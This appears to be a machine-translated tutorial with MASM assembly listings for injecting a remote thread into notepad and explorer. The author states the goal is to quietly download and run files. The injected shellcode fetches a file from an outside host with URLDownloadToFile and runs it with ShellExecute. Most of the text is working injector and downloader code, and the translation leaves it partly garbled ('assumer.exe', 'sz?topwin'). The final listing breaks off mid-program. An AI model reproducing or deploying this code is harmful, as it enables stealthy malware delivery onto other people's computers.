Implementation of simple thread Injection

Thread injection is being implemented recently. In fact, this process is quite simple. Thread injection written in some books is implemented in the form of call [ebx + XXXX. In this case, the invoke command cannot be used directly. Just like calling messagebox with a pseudo command, it would have been invoke MessageBox, NULL, addr szCaption, addr szTitle, MB_ OK. If it is remotely injected, the code will change and be written as follows:

Lea eax [ebx + szTitle]
Lea ecx [ebx + szCaption]
_ Invoke [ebx, _ MessageBox], NULL, ecx, eax, MB_ OK
 

It's quite troublesome. By referring to some information on the network, I inject notepad, calculators, or other software processes that know the window class through threads. On the basis of them, thread injection, and then the injected code is written into other things that I need to reflect. For example, it is a personal hobby to quietly download and run some things and delete some files.

The following is the main code to run after the notepad process is injected:

Shellcode proc
Push 00403008 H
Call LoadLibrary
Push 00403013 H
Call LoadLibrary
Invoke URLDownloadToFile, NULL, addr szURL, addr szSaveFile, NULL, NULL
Invoke ShellExecute, 0, 0, addr szSaveFile, 0, SW_SHOW
Invoke ExitThread, 0
Ret
Shellcode endp
 

This code is inserted in notepad to run, so it needs to load the dll required by the API. For example, URLDownloadToFile is in urlmon. dll. Therefore, it must be loaded using LoadLibrary.

Push 00403008 H
Call LoadLibrary
 

The URL is urlmon. dll Memory Address, in the space of the same exe file, the memory address is not changed, so the stack is pressed for 8 h and then called LoadLibrary, so that we can use this API to download the file. ShellExecute is in shell32.dll and is called by a remote thread.

Push 00403013 H
Call LoadLibrary
 

Among them, is the memory address of shell32.dll. After all the data is loaded, the API can be called normally.

Invoke URLDownloadToFile, NULL, addr szURL, addr szSaveFile, NULL, NULL
Invoke ShellExecute, 0, 0, addr szSaveFile, 0, SW_SHOW
 

Uses a pseudo-command for injection.
How can I find the notepad ID? Windows provides FindWindow. If you know the window class of notepad, you can find GetWindowThreadProcessId. Knowing the window class in notepad is simple. You only need to download some tools to view the window class name. Then you can inject a program process space that knows the window class.

SzCalss db Notepad, 0
.
Invoke FindWindow, addr szCalss, 0
.
 

Call GetWindowThreadProcessId to find the PID from the window class handle. Next, OpenProcess finds the handle, in which the "Allow Remote thread creation", "allow process address space", and "PROCESS_VM_WRITE" permission should be enabled. Because we want to write operations on the notepad space, the permissions must be sufficient. If notepad does not have memory space for us to store code, it would be useless. Then we need to release and allocate memory space. VirtualFreeEx and VirtualAllocEx can do this, where the handles returned by VirtualAllocEx are stored in the register eax, mov hWnd and eax are transferred to hWnd as the operation handle, and WriteProcessMemory is used to start writing its memory space. CreateRemoteThread creates the specified Thread target process handle, which is our final injection code.
The complete code is as follows:

. 386
. Model flat, stdcall
Option casemap: none
Include windows. inc
Include kernel32.inc
Include user32.inc
Include urlmon. inc
Include shell32.inc
Includelib kernel32.lib
Includelib user32.lib
Includelib urlmon. lib
Includelib shell32.lib

. Data
SzCalss db Notepad, 0
SzURL db [url] Http: // chenmingzhong87.xinwen365.com/shell.doc#/url#,0
SzSaveFile db C: shell.doc, 0

. Data?
HModule dd?
HWnd dd?
HProcess dd?
ShellSize dd?
Pid dd?
Written dd?
DwTid dd?
. Code

Shellcode proc
Push 00403008 H
Call LoadLibrary
Push 00403013 H
Call LoadLibrary
Invoke URLDownloadToFile, NULL, addr szURL, addr szSaveFile, NULL, NULL
Invoke ShellExecute, 0, 0, addr szSaveFile, 0, SW_SHOW
Invoke ExitThread, 0
Ret
Shellcode endp
Start:
Invoke FindWindow, addr szCalss, 0
Invoke GetWindowThreadProcessId, eax, addr Pid
Invoke OpenProcess, PROCESS_CREATE_THREAD or PROCESS_VM_WRITE +
PROCESS_VM_OPERATION, FALSE, Pid
Mov hProcess, eax
Invoke VirtualFreeEx, hProcess, hModule, 0, MEM_RELEASE
Invoke VirtualAllocEx, hProcess, hModule, ShellSize, MEM_COMMIT or MEM_RESERVE,
PAGE_EXECUTE_READWRITE
Mov hWnd, eax
Invoke WriteProcessMemory, hProcess, hWnd, hModule, ShellSize, addr Written
Invoke CreateRemoteThread, hProcess, 0, 0, addr Shellcode, hModule, 0, addr dwTid
Invoke ExitProcess, 0
End start
 

In fact, this section:

Shellcode proc
Push 00403008 H
Call LoadLibrary
Push 00403013 H
Call LoadLibrary
Invoke URLDownloadToFile, NULL, addr szURL, addr szSaveFile, NULL, NULL
Invoke ShellExecute, 0, 0, addr szSaveFile, 0, SW_SHOW
Invoke ExitThread, 0
Ret
Shellcode endp
 

You can convert it into a machine code, so that you do not need a subroutine. Directly "szShellcode db...", when writing a space address, directly enter Wirte.
Test method:

Open a notepad, run the program, inject it, and then run your writing version.

BUG description:

The same compiled program runs at this time and the test is successful. If the writing version is opened normally, I don't know why, and the notepad is incorrect. I am depressed. Please take a trick if you know why.

I just copied the code of a cool user and made comments, and put the code in my code. Then I can see the assumer.exe process. Congratulations:

Mov edi, eax
Assume edi: ptr IMAGE_DOS_HEADER
Add edi, [edi]. e_lfanew
Add edi, sizeof dword
Add edi, sizeof IMAGE_FILE_HEADER
Assume edi: ptr IMAGE_OPTIONAL_HEADER32
Mov eax, [edi]. SizeOfImage; saves the memory Shot size of the entire PE
Mov ShellSize, eax; save in dwSize to write
Assume edi: NOTHING
 

Just make a note and add the MZ of a PE file under DOS to the Register edi. The usage of sizeof seems to be the size of the BYTE variable in the memory, and then stores the memory size of the compiled program SizeOfImage in eax. Mov ShellSize, eax, save SizeOfImage to ShellSize.

After the modification, the complete code of "cmder.exe" is entered. The Code passes the test in Windows XP SP2:

. 386
. Model flat, stdcall
Option casemap: none
Include windows. inc
Include kernel32.inc
Include user32.inc
Include urlmon. inc
Include shell32.inc
Includelib kernel32.lib
Includelib user32.lib
Includelib urlmon. lib
Includelib shell32.lib

. Data
Szw.topclass db Progman, 0 refers to the window class of assumer.exe
Szw.topwindow db Program Manager, 0
SzURL db Http: // chenmingzhong87.xinwen365.com/shell.doc,0
SzSaveFile db C: shell.doc, 0

. Data?
HModule dd?
HWnd dd?
HProcess dd?
ShellSize dd?
Pid dd?
Written dd?
DwTid dd?
. Code

Shellcode proc
Push 00403008 H
Call LoadLibrary
Push 00403013 H
Call LoadLibrary
Invoke URLDownloadToFile, NULL, addr szURL, addr szSaveFile, NULL, NULL
Invoke ShellExecute, 0, 0, addr szSaveFile, 0, SW_SHOW
Invoke ExitThread, 0
Ret
Shellcode endp
Start:
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>
The Code started here is borrowed from someone else's
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>
Invoke GetModuleHandle, 0
Mov hModule, eax
Mov edi, eax
Assume edi: ptr IMAGE_DOS_HEADER
Add edi, [edi]. e_lfanew
Add edi, sizeof dword
Add edi, sizeof IMAGE_FILE_HEADER
Assume edi: ptr IMAGE_OPTIONAL_HEADER32
Mov eax, [edi]. SizeOfImage
Mov ShellSize, eax
Assume edi: NOTHING
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>
Then the original code continues to be executed.
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>
Invoke FindWindow, addr szw.topclass, addr sz?topwin